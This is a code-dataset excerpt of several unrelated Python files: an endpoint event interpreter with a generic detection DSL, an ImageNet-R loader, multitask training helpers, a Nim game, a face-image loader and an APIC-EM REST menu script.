% ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.MODULE_NAME ) ),\n 'notification.FILE_CREATE' : ( 'a file is created',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s created the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_DELETE' : ( 'a file is deleted',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s deleted the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_MODIFIED' : ( 'a file is modified',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s modified the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_READ' : ( 'a file is read',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s read the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n}\n\ndef _sanitizeJson( o, summarized = False ):\n if type( o ) is dict:\n for k, v in o.iteritems():\n o[ k ] = _sanitizeJson( v, summarized = summarized )\n elif type( o ) is list or type( o ) is tuple:\n o = [ _sanitizeJson( x, summarized = summarized ) for x in o ]\n elif type( o ) is uuid.UUID:\n o = str( o )\n else:\n try:\n if ( type(o) is str or type(o) is unicode ) and \"\\x00\" in o: raise Exception()\n json.dumps( o )\n except:\n o = base64.b64encode( o )\n if summarized is not False and len( str( o ) ) > summarized:\n o = str( o[ : summarized ] ) + '...'\n return o\n\nclass EventInterpreter( object ):\n def __init__( self, event = None ):\n if event is not None:\n self.setEvent( event )\n\n def setEvent( self, event ):\n self.event = event\n self.eventType = event.keys()[ 0 ]\n\n def description( self ):\n return _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 0 ]\n\n def name( self ):\n return self.eventType.split( '.' 
)[ -1 ]\n\n def key( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 1 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def shortKey( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 2 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def narrative( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 3 ]\n if f is not None:\n return f( self.event )\n else:\n return None\n\n def object( self ):\n f = _eventTypes.get( self.eventType, ( None, None, None, None ) )[ 4 ]\n if f is not None:\n return f( self.event )\n else:\n return ( None, None )\n\n def getAtom( self ):\n return normalAtom( _x_( self.event, '?/hbs.THIS_ATOM' ) )\n\n def getParentAtom( self ):\n return normalAtom( _x_( self.event, '?/hbs.PARENT_ATOM' ) )\n\n def __str__( self ):\n return '%s( %s )' % ( self.name(), self.key() )\n\n def getTimestamp( self ):\n return _x_( self.event, '?/base.TIMESTAMP' )\n\nclass EventDSL( object ):\n __slots__ = [ 'data', 'mtd', 'dataType', '_isCaseSensitive', '_reFlags', '_ops' ]\n\n def __init__( self, event, mtd, isCaseSensitive = False ):\n self.data = event\n self.mtd = mtd\n try:\n self.dataType = event.keys()[ 0 ]\n except:\n self.dataType = None\n self._isCaseSensitive = isCaseSensitive\n self._reFlags = 0 if isCaseSensitive else re.IGNORECASE\n self._ops = { 'path' : lambda e, v: _x_( e, '?/base.FILE_PATH' ) == v,\n 'pathEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'pathStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'pathMatches' : lambda e, v: re.match( v, _x_( e, '?/base.FILE_PATH' ), self._reFlags ),\n 'commandLine' : lambda e, v: _x_( e, '?/base.COMMAND_LINE' ) == v,\n 'commandLineEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'commandLineStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'commandLineMatches' : lambda e, v: re.match( v, _x_( e, '?/base.COMMAND_LINE' ), self._reFlags ),\n 'user' : lambda e, v: _x_( e, '?/base.USER_NAME' ) == v,\n 'userEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'userStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'userMatches' : lambda e, v: re.match( v, _x_( e, '?/base.USER_NAME' ), self._reFlags ),\n 'domain' : lambda e, v: _x_( e, '?/base.DOMAIN_NAME' ) == v,\n 'domainEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.DOMAIN_NAME' ), self._reFlags ),\n 'domainStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.DOMAIN_NAME' ), self._reFlags ),\n 'domainMatches' : lambda e, v: re.match( v, _x_( e, '?/base.DOMAIN_NAME' ), re.IGNORECASE ),\n 'cname' : lambda e, v: _x_( e, '?/base.CNAME' ) == v,\n 'cnameEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.CNAME' ), self._reFlags ),\n 'cnameStartsWith' : lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.CNAME' ), self._reFlags ),\n 'cnameMatches' : lambda e, v: re.match( v, _x_( e, '?/base.CNAME' ), re.IGNORECASE ),\n 'ip' : lambda e, v: _x_( e, '?/base.IP_ADDRESS' ) == v,\n 'ipEndsWith' : lambda e, v: re.match( '.*%s$' % re.escape( v ), _x_( e, '?/base.IP_ADDRESS' ), self._reFlags ),\n 'ipStartsWith' : 
lambda e, v: re.match( '^%s.*' % re.escape( v ), _x_( e, '?/base.IP_ADDRESS' ), self._reFlags ),\n 'ipIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, '?/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'hash' : lambda e, v: re.match( '^%s$' % re.escape( v ), _x_( e, '?/base.HASH' ).encode( 'hex' ), re.IGNORECASE ),\n 'userId' : lambda e, v: _x_( e, '?/base.USER_ID' ) == v,\n 'dstIpIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, 'base.DESTINATION/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'srcIpIn' : lambda e, v: ipaddress.ip_address( unicode( _x_( e, 'base.SOURCE/base.IP_ADDRESS' ) ) ) in ipaddress.ip_network( unicode( v ) ),\n 'dstPort' : lambda e, v: _x_( e, 'base.DESTINATION/base.PORT' ) == v,\n 'srcPort' : lambda e, v: _x_( e, 'base.SOURCE/base.PORT' ) == v,\n 'isOutgoing' : lambda e, v: ( 1 == _x_( e, 'base.IS_OUTGOING' ) ) is v }\n\n def asJSON( self ):\n return _sanitizeJson( self.data )\n\n def atom( self ):\n return normalAtom( _x_( self.data, '?/hbs.THIS_ATOM' ) )\n\n def parentAtom( self ):\n return normalAtom( _x_( self.data, '?/hbs.PARENT_ATOM' ) )\n\n def Event( self, **kwargs ):\n if isinstance( self.data, dict ):\n e = self.data\n for k, v in kwargs.iteritems():\n if k not in self._ops:\n raise Exception( 'Detection Lambda operation \"%s\" invalid!' % k )\n try:\n if not self._ops[ k ]( e, v ):\n return False\n except:\n print( traceback.format_exc() )\n return False\n return True\n elif isinstance( self.data, list ):\n for e in self.data:\n isMatch = True\n for k, v in kwargs.iteritems():\n if k not in self._ops:\n raise Exception( 'Detection Lambda operation \"%s\" invalid!' % k )\n try:\n if not self._ops[ k ]( e, v ):\n isMatch = False\n break\n except:\n print( traceback.format_exc() )\n isMatch = False\n break\n if isMatch:\n return True\n return False\n\n def Process( self, **kwargs ):\n if self.dataType in ( 'notification.EXISTING_PROCESS', \n 'notification.NEW_PROCESS' ):\n return self.Event( **kwargs )\n elif self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _x_( self.data, '?/base.PROCESS' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return tmpEvent.Event( **kwargs )\n return False\n\n def ParentProcess( self, **kwargs ):\n if self.dataType in ( 'notification.EXISTING_PROCESS', \n 'notification.NEW_PROCESS' ):\n subEvent = self.data.get( 'base.PARENT', None )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return tmpEvent.Event( **kwargs )\n elif self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _x_( self.data, '?/base.PROCESS/base.PARENT' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( { \"_\" : subEvent }, self.mtd )\n return False\n\n def Dns( self, **kwargs ):\n if 'notification.DNS_REQUEST' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Hash( self, **kwargs ):\n if self.dataType in ( 'notification.CODE_IDENTITY', \n 'notification.ONGOING_IDENTITY' ):\n return self.Event( **kwargs )\n return False\n\n def NetworkSummary( self, **kwargs ):\n if 'notification.NETWORK_SUMMARY' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Connections( self, **kwargs ):\n if self.dataType in ( 'notification.NETWORK_SUMMARY', ):\n subEvent = _xm_( self.data, '?/base.PROCESS/base.NETWORK_ACTIVITY' )\n if subEvent is None:\n return False\n tmpEvent = EventDSL( subEvent, self.mtd )\n return tmpEvent.Event( **kwargs )\n return 
False\n\n def UserObserved( self, **kwargs ):\n if 'notification.USER_OBSERVED' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def StartingUp( self, **kwargs ):\n if 'notification.STARTING_UP' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Sync( self, **kwargs ):\n if 'notification.SYNC' == self.dataType:\n return self.Event( **kwargs )\n return False\n\n def Detection( self, name = None, **kwargs ):\n if self.dataType.startswith( 'detection_' ):\n if name is not None and self.dataType != ( 'detection_%s' % name ):\n return False\n return self.Event( **kwargs )\n return False","sub_path":"beach/hcp/utils/EventInterpreter.py","file_name":"EventInterpreter.py","file_ext":"py","file_size_in_byte":17033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240043681","text":"import os\n\nfrom dassl.data.datasets import DATASET_REGISTRY, Datum, DatasetBase\nfrom dassl.utils import listdir_nohidden\n\nfrom .imagenet import ImageNet\n\nTO_BE_IGNORED = [\"README.txt\"]\n\n\n@DATASET_REGISTRY.register()\nclass ImageNetR(DatasetBase):\n \"\"\"ImageNet-R(endition).\n\n This dataset is used for testing only.\n \"\"\"\n\n dataset_dir = \"imagenet-rendition\"\n\n def __init__(self, cfg):\n root = os.path.abspath(os.path.expanduser(cfg.DATASET.ROOT))\n self.dataset_dir = os.path.join(root, self.dataset_dir)\n self.image_dir = os.path.join(self.dataset_dir, \"imagenet-r\")\n\n text_file = os.path.join(self.dataset_dir, \"classnames.txt\")\n classnames = ImageNet.read_classnames(text_file)\n\n data = self.read_data(classnames)\n\n super().__init__(train_x=data, test=data)\n\n def read_data(self, classnames):\n image_dir = self.image_dir\n folders = listdir_nohidden(image_dir, sort=True)\n folders = [f for f in folders if f not in TO_BE_IGNORED]\n items = []\n\n for label, folder in enumerate(folders):\n imnames = listdir_nohidden(os.path.join(image_dir, folder))\n classname = classnames[folder]\n for imname in imnames:\n impath = os.path.join(image_dir, folder, imname)\n item = Datum(impath=impath, label=label, classname=classname)\n items.append(item)\n\n return items\n","sub_path":"datasets/imagenet_r.py","file_name":"imagenet_r.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461504085","text":"#! /usr/bin/python3\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch\nfrom torch import nn\n\n''' Given a trained classification model, an input set and an output set,\n this method predicts the class for the inputs and compares the \n predictions to the true targets. 
It counts the errors and computes \n the accuracy of the model on the given sets.\n \n Parameters : \n model: pytorch Model trained classification model\n X: tensor input data (features)\n Y: tensor target data (class)\n mini_batch_size: int specifies predictions batch size\n \n Returns : \n accuracy: float accuracy value, between 0 and 1\n'''\ndef accuracy_mt (model, X, Y, mini_batch_size=100) :\n nb_errors = 0\n \n # Proceed in batches\n for b in range(0, X.size(0), mini_batch_size):\n \n # Predict batch\n output = model(X.narrow(0, b, mini_batch_size))[0]\n _, predicted_classes = output.data.max(1)\n \n # Count errors in batch\n for k in range(mini_batch_size):\n if Y[b + k] != predicted_classes[k]:\n nb_errors = nb_errors + 1\n \n accuracy = 1 - nb_errors/X.shape[0]\n return accuracy\n\n\n''' Loss function for multitask-model\n Parameters : \n [...]\n model trained model so that : model : X -> ((pred_aux_1, pred_aux_2), pred_main)\n Y_aux tuple (targ_aux_1, targ_aux_2)\n'''\ndef loss_mt (model, X, Y_main, Y_aux,\n main_weight=0.5,\n loss_main=nn.CrossEntropyLoss(), loss_aux=nn.CrossEntropyLoss() ) :\n prediction_main, prediction_aux = model(X)\n # main loss\n mainloss = loss_main(prediction_main, Y_main)\n # aux loss\n auxloss1 = loss_aux(prediction_aux[0], Y_aux[0])\n auxloss2 = loss_aux(prediction_aux[1], Y_aux[1])\n auxloss = (auxloss1+auxloss2)/2.0\n # mix and return\n return main_weight*mainloss + (1-main_weight)*auxloss;\n \n \n\n \n''' This method trains a pytorch model on a given training set over the \n course of a specified number of epochs, evaluating its performance \n on a validation set at each epoch. It returns the training and \n validation history as a dict.\n Parameters\n Model trained model that produces (mainPred, (auxpred1, auxpred2))\n [...]\n trAuxY auxiliary results, shape (2, 1000)\n'''\ndef train_model_mt (\n model, \n trX, trY, trAuxY,\n valX, valY, valAuxY,\n eta=1e-3, mainLossWeight=0.5,\n mini_batch_size=100, epochs=25,\n criterion=nn.CrossEntropyLoss(), \n opt=torch.optim.Adam ) :\n \n history = {'train_loss':[], 'train_acc':[], 'val_loss':[], 'val_acc':[]}\n optimizer = opt(model.parameters(), lr=eta)\n \n for e in range(epochs):\n sum_loss = 0\n \n with torch.no_grad():\n # Compute validation loss and accuracy\n val_acc = accuracy_mt(model, valX, valY)\n history['val_acc'].append(val_acc)\n\n # Compute training accuracy w/o messing with training\n train_acc = accuracy_mt(model, trX, trY)\n history['train_acc'].append(train_acc)\n \n # Compute validation loss\n val_output = model(valX)\n val_loss = criterion(val_output[0], valY)\n history['val_loss'].append(val_loss.item())\n \n for b in range(0, trX.size(0), mini_batch_size):\n # Classify batch, compute loss and perform backpropagation with parameter updates\n # REPLACED : \n #xmain = model(X.narrow(0, b, mini_batch_size))\n #loss = criterion(output, Y.narrow(0, b, mini_batch_size))\n loss = loss_mt (\n model, \n trX.narrow(0, b, mini_batch_size), \n trY.narrow(0, b, mini_batch_size), \n trAuxY[:,b:b+mini_batch_size],\n main_weight=mainLossWeight\n )\n model.zero_grad()\n loss.backward()\n optimizer.step()\n sum_loss = sum_loss + loss.item()\n\n \n history['train_loss'].append(sum_loss)\n #clear_output(wait=True)\n print('Epoch ' + str(e+1) + '/' + str(epochs))\n \n return history\n \n","sub_path":"workspace/auxloss_basic/utils_mt.py","file_name":"utils_mt.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
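A quick smoke test for the multitask helpers in the record above may be useful. This is an illustrative sketch only: it assumes train_model_mt (and its dependencies) are importable from utils_mt.py, and the ToyMT model, tensor shapes, and epoch count are invented for the example.

# Hypothetical driver for the multitask trainer above. The model returns
# (main prediction, (aux prediction 1, aux prediction 2)) as the helpers expect.
import torch
from torch import nn

class ToyMT(nn.Module):
    def __init__(self):
        super().__init__()
        self.body = nn.Flatten()
        self.main = nn.Linear(2 * 14 * 14, 2)   # 2-class main task
        self.aux = nn.Linear(2 * 14 * 14, 10)   # 10-class auxiliary task

    def forward(self, x):
        h = self.body(x)
        return self.main(h), (self.aux(h), self.aux(h))

trX = torch.randn(1000, 2, 14, 14)          # made-up input shape
trY = torch.randint(0, 2, (1000,))           # main targets
trAuxY = torch.randint(0, 10, (2, 1000))     # two auxiliary target rows
history = train_model_mt(ToyMT(), trX, trY, trAuxY,
                         trX, trY, trAuxY, epochs=2)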
+{"seq_id":"25752064","text":"\"\"\"\n Author : John Martinsson\n Summary : An implementation of the game Nim. The computer will play a perfect\n game if possible.\n\"\"\"\n\nimport random as rand\n\nclass Board():\n \"\"\" The board class\n \"\"\"\n def __init__(self):\n self.rows = []\n self.maxSticks = 5 # this is actually the max bits\n self.defaultBoard = [7, 5, 3]\n\n def getGameSettings(self):\n \"\"\" Get the settings for the board by the user\n \"\"\"\n data = input('| default or custom board? : ')\n while data != 'default' and data != 'custom':\n print('| Valid input: , ')\n data = input('| Default or custom board: ')\n\n if data == 'default':\n self.rows = self.defaultBoard\n if data == 'custom':\n while True:\n data = input('| Input number of sticks for row {} ({} max): '\n .format(len(self.rows), 2**self.maxSticks-1))\n \n if data == 'done':\n break\n \n try:\n if not int(data) > 2**self.maxSticks-1:\n self.rows.append(int(data))\n else:\n print('| To many sticks')\n except Exception:\n print('| Invalid input, to end enter:')\n\n def displayPosition(self):\n \"\"\" Display the position of the board (as sticks)\n \"\"\"\n print('|-----------------------------------------------------------------------')\n \n for r in range(len(self.rows)):\n row = self.rows[r]\n s = ['|' for i in range(row)]\n s = ''.join(s)\n template = '{0:15}{1:40}{2:50}'\n s1 = '| row {} :'.format(r)\n s2 = '({} sticks)'.format(row)\n\n print(template.format(s1, s, s2))\n\n print('|-----------------------------------------------------------------------\\n')\n\n def checkGameWon(self):\n \"\"\" Check if all sticks are taken, then the game is won.\n \n Returns\n -------\n Bool\n True if game is over, False otherwise\n \"\"\"\n return sum(self.rows) == 0\n\n def take(self, s, r):\n \"\"\" Take s sticks from the r:th row of this board.\n \n Returns\n -------\n Bool\n True if the move is valid, otherwise False\n \"\"\"\n # check enough sticks\n if(self.rows[r] >= s):\n self.rows[r] -= s\n return True\n else:\n return False\n\n def reverseTake(self, s, r):\n \"\"\" Reverse a move\n \"\"\"\n # reverse the take\n self.rows[r] += s\n\n\ndef checkParity(board):\n \"\"\" Checks the parity between the number of sticks in each row. This number is\n represented as a binary string. \n\n Examples\n --------\n \n Board 1\n -------\n row 0: 0111 (7 sticks)\n row 1: 0101 (5 sticks)\n row 2: 0011 (3 sticks)\n ------------------------\n Parity: 0001 (Odd)\n\n That is, there is an odd number of 1:s at the right most digit between each\n row, and so on. \n \n We say that the parity is even if we get all even, that\n is, 0000 in this case, which is a kernel position in this game. 
\n \n For example we could change the parity of the board in Ex.1 to even by \n taking 1 stick from row 0, which would turn Board 1 -> Board 2\n\n Board 2\n -------\n row 0: 6 = 0110 (6 sticks)\n row 1: 5 = 0101 (5 sticks)\n row 2: 3 = 0011 (3 sticks)\n ------------------------\n Parity: 0000 (Even)\n \"\"\"\n # initialize to parity 0\n parity = [0 for i in range(board.maxSticks)]\n for row in board.rows:\n # binary representation of row\n form = '{' + '0:0{}b'.format(board.maxSticks) + '}'\n b = form.format(row)\n for i in range(board.maxSticks):\n parity[i] += int(b[i])\n\n s = []\n for p in parity:\n if p%2 == 0:\n s.append('0')\n else:\n s.append('1')\n\n return ''.join(s)\n\ndef parityEven(board):\n \"\"\" Check if the board has an even parity\n \n Returns\n -------\n Bool\n True if even parity, False otherwise\n \"\"\"\n # if only zeroes in the parity string, we say that the parity is even\n return int(checkParity(board), 2) == 0\n\n\n\ndef computerMove(board):\n \"\"\" Perform the next computer move, will force the player into a kernel if\n possible, otherwise it will just take a stick from one of the rows.\n \n Parameters\n ----------\n board : Board()\n The board that is being played\n\n Returns\n -------\n Bool\n True if this move made the computer win, False otherwise\n \"\"\"\n # Loop over all possible moves, make move if it turns the board into a board\n # with even parity.\n for r in range(len(board.rows)):\n for i in range(board.rows[r]):\n s = i+1\n # try the move to take s sticks from r\n board.take(s, r)\n # The kernel position of this game is to put the opponent into a\n # position where the parity between all binary numbers is even. So\n # we check if this move leads to an even parity.\n if parityEven(board): \n print('Computer made move: {},{}'.format(s, r))\n\n if(board.checkGameWon()):\n print('#######################################################################')\n print('# Computer wins!                                                      #')\n print('#######################################################################')\n board.displayPosition()\n return True\n else:\n board.displayPosition()\n return False\n # if not, simply reverse the move, and try the next one.\n else:\n board.reverseTake(s, r)\n\n # If the computer is in fact in a losing position, that is, the parity is\n # already even, just take some amount of sticks from a row, and be done with it.\n while True:\n # pick random row\n r = rand.randint(0, len(board.rows) - 1)\n # if it has at least one stick\n if board.rows[r] >= 1:\n # take a random amount of these sticks\n s = rand.randint(1, board.rows[r])\n board.take(s, r)\n print('Computer made move: {},{}'.format(s, r))\n board.displayPosition()\n\n return False\n\ndef playerMove(board):\n \"\"\" Get and perform the next player move, will display new board position, as well\n as check if the game is over.\n\n Parameters\n ----------\n board : Board()\n The board that is being played\n\n Return\n ------\n Bool\n True if player wins with this move, False otherwise\n \"\"\"\n # assumed form, (sticks,row)\n while True:\n try:\n playerMove = input('Enter next move: ') \n m = playerMove.split(',')\n s = int(m[0])\n r = int(m[1])\n\n if r < len(board.rows) and s <= board.rows[r]:\n board.take(s, r)\n break\n else:\n print('Invalid move')\n\n except Exception:\n print('Invalid input, try again. Valid input: <sticks,row>')\n \n if(board.checkGameWon()):\n print('#######################################################################')\n print('# You win!                                                            #')\n print('#######################################################################')\n board.displayPosition()\n return True\n else:\n board.displayPosition()\n return False\n\ndef main():\n \"\"\" The main game loop\n \"\"\"\n # initialize the board\n board = Board()\n print('|-----------------------------------------------------------------------')\n print('| Game settings:')\n print('| <default> : for a default board')\n print('| <custom> : for custom settings')\n print('| <done> : when done entering custom settings')\n print('|-----------------------------------------------------------------------\\n')\n # get the game settings from the user\n print('|-----------------------------------------------------------------------')\n board.getGameSettings()\n print('|-----------------------------------------------------------------------\\n')\n # display the board position\n print('|=======================================================================')\n print('| The game has begun!')\n print('|=======================================================================')\n print('| Moves on form : <sticks,row> : will take #sticks from r:th row')\n print('| Example : <3,0> : 3 sticks will be taken from row 0.')\n print('|')\n print('| Nim rules: http://en.wikipedia.org/wiki/Nim')\n print('|-----------------------------------------------------------------------\\n')\n\n board.displayPosition()\n playerWon = False\n computerWon = False\n\n # game main loop, loop until either player or computer has won\n while not playerWon and not computerWon:\n playerWon = playerMove(board)\n if not playerWon:\n computerWon = computerMove(board)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"nim.py","file_name":"nim.py","file_ext":"py","file_size_in_byte":9632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
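The per-bit parity check in the nim record above is equivalent to XOR-ing the row sizes together, the classic nim-sum. A compact restatement of that equivalence (illustrative sketch, separate from the record):

# Equivalent formulation of checkParity/parityEven above: a position is a
# losing (kernel) position exactly when the XOR of the row sizes is 0.
from functools import reduce

def nim_sum(rows):
    return reduce(lambda a, b: a ^ b, rows, 0)

assert nim_sum([7, 5, 3]) != 0   # the default board; the mover can win
assert nim_sum([6, 5, 3]) == 0   # after taking 1 from row 0: even parity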
+{"seq_id":"352023845","text":"# coding:utf-8\r\nimport os\r\nimport random\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom scipy.misc import imresize\r\nimport pandas as pd\r\n\r\ndef readFaceData(path,long=300,wide=300,deep=3):\r\n imageList = os.listdir(path)\r\n n = len(imageList)\r\n X = np.empty((n,long,wide,deep))\r\n Y = []\r\n for i,imageName in enumerate(imageList):\r\n X[i,:,:,:] = imresize(cv2.imread(path+'/'+imageName),(long,wide))\r\n Y.append(imageName[0:4])\r\n label = [Y[0],Y[-1]]\r\n return X,pd.get_dummies(np.array(Y)).values,label\r\n\r\n\r\ndef shuffle(X, Y):\r\n Y = np.array(Y)\r\n n = len(Y)\r\n index = random.sample(range(n), n)\r\n x_, y_ = X[index, :, :, :], Y[index,:]\r\n return x_, y_\r\n\r\n\r\ndef getTrainData(path=\"./data/trainingData\",longs=300,wide=300):\r\n X, Y,label = readFaceData(path, longs, wide)\r\n x_train,y_train = shuffle(X,Y)\r\n return x_train,y_train,label\r\n\r\n# x,y,label = getTrainData()\r\n# print(label)","sub_path":"faceDataHandle.py","file_name":"faceDataHandle.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"598140689","text":"#!/usr/bin/python3\n#from IPy import IP\nimport sys\nimport IPy\n\n\n# PROGRAM STARTING POINT\n#def start_program():\n# select_rest_api_call_type()\n\n\ndef select_rest_api_call_type():\n # List of master functions used with REST API\n try: \n print(\"##############################################################################\")\n print(\"######################## FUNCTION SELECTION ###########################\")\n print(\"##############################################################################\")\n print(\"1. GET\")\n print(\"2. 
PUT\")\n print(\"3. DELETE\")\n print(\"4. quit\")\n \n rest_api_call_type = int(input(\"Please select a function to continue: \"))\n \n #Verification value is valid...\n if 0 >= rest_api_call_type or rest_api_call_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n\n try: \n print(\"YOU MADE IT TO TOP_MENU\") \n if rest_api_call_type == 1: \n print(\"\\nYou chose to use GET\\n\") \n rest_api_call_type = \"GET\"\n elif rest_api_call_type == 2: \n print(\"\\nYou chose to use PUT\\n\") \n rest_api_call_type = \"PUT\"\n elif rest_api_call_type == 3: \n print(\"\\nYou chose to use DELETE\\n\") \n rest_api_call_type = \"DELETE\"\n elif rest_api_call_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0) \n except Exception as e: \n print(\"\\n\\n***oops***2\") \n sys.exit(1)\n \n return rest_api_call_type\n\n\n# **************************** TARGET SERVER TYPE SELECTION ****************************\n#\n#Used to select the target server type, such as ISE, APICEM, CSR, ISR4K and any other platform that uses REST API\ndef select_target_server_type():\n # SUPPORTED SERVERS FOR API CALLS\n # DISPLAYS A LIST TO USER TO CHOOSE FROM\n print(\"\\nWelcome!\\nThese are the supported systems, please select a value by entering the corresponding \"\n \"numbered value\\n\")\n\n #Print possible options for target server types\n try: \n print(\"1. APIC-EM\") \n print(\"2. ISE\") \n print(\"3. CSR\") \n print(\"4. Quit\") \n \n target_server_type = int(input(\"\\nPlease select a SYSTEM TYPE to continue: \")) \n\n #Verification value is valid...\n if 0 >= target_server_type or target_server_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n print(\"\\n*** Choose between 1 - 4 ***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n \n try: \n if target_server_type == 1: \n print(\"\\nYou have selected APIC-EM \\n\") \n target_server_type = \"APIC-EM\" \n elif target_server_type == 2: \n print(\"\\nYou have selected ISE \\n\") \n target_server_type = \"ISE\" \n elif target_server_type == 3: \n print(\"\\nYou have selected CSR \\n\") \n target_server_type = \"CSR\" \n elif target_server_type == 4: \n print(\"\\nQUITTING APPLICATION\\n\") \n sys.exit(0) \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1) \n \n return target_server_type \n\ndef api_controller_input():\n while True:\n try:\n\t\t #Ask for IP or FQDN\n #CURRENTLY ONLY ACCEPTS IP ADDRESS - FQDN CHECK FAILS.\n print(\"##############################################################################\")\n print(\"########################### APIC-EM URL ##############################\")\n print(\"##############################################################################\")\n fqdn_or_ip = IPy.IP(input(\"Please enter the server IP ADDRESS: \"))\n\t\t #USER REVIEWS ENTRY\n print(fqdn_or_ip + \"\\n\")\n if IPy.IP(fqdn_or_ip):\n print(\"1. YES\")\n print(\"2. NO\")\n socket_validate = int(input(\"Looks like you entered an IP address correct? \"))\n if (socket_validate == 1):\n print(\"GREAT! - Moving on....\\n\\n\")\n IPy.IP(fqdn_or_ip).strNormal\n return fqdn_or_ip\n else:\n continue\n else:\n print(\"1. YES\")\n print(\"2. NO\")\n socket_validate = int(input(\"Looks like you entered\" + fqdn_or_ip + \" correct? \"))\n if (socket_validate == 1):\n print(\"GREAT! 
LET'S MOVE ON TO THE SERVERS.\")\n IPy.IP(fqdn_or_ip).strNormal\n return fqdn_or_ip\n else:\n continue\n except ValueError:\n print(\"Sorry thats not valid try again\")\n\n \n#\n# Selection of which APIC-EM service will be called\n#\ndef select_apicem_service():\n try:\n print(\"1. INVENTORY\")\n print(\"2. NETWORK DISCOVERY\")\n print(\"3. TBD\")\n print(\"4. Quit\")\n\n apicem_service_type = int(input(\"Please select the FUNCTION category: \"))\n \n #Verification value is valid...\n if 0 >= apicem_service_type or apicem_service_type >= 5: \n print(\"\\n***Incorrect Selection***\\n\\n\") \n else: \n pass \n except Exception as e: \n print(\"\\n\\n***oops***\") \n sys.exit(1)\n\n try: \n if apicem_service_type == 1: \n print(\"\\nYou chose Inventory\\n\") \n apicem_service_type = \"INVENTORY\"\n if apicem_service_type == 2: \n print(\"\\nYou chose NETWORK DISCOVERY\\n\") \n apicem_service_type = \"NET-DISC\"\n if apicem_service_type == 3: \n print(\"\\nYou chose TBD\\n\") \n apicem_service_type = 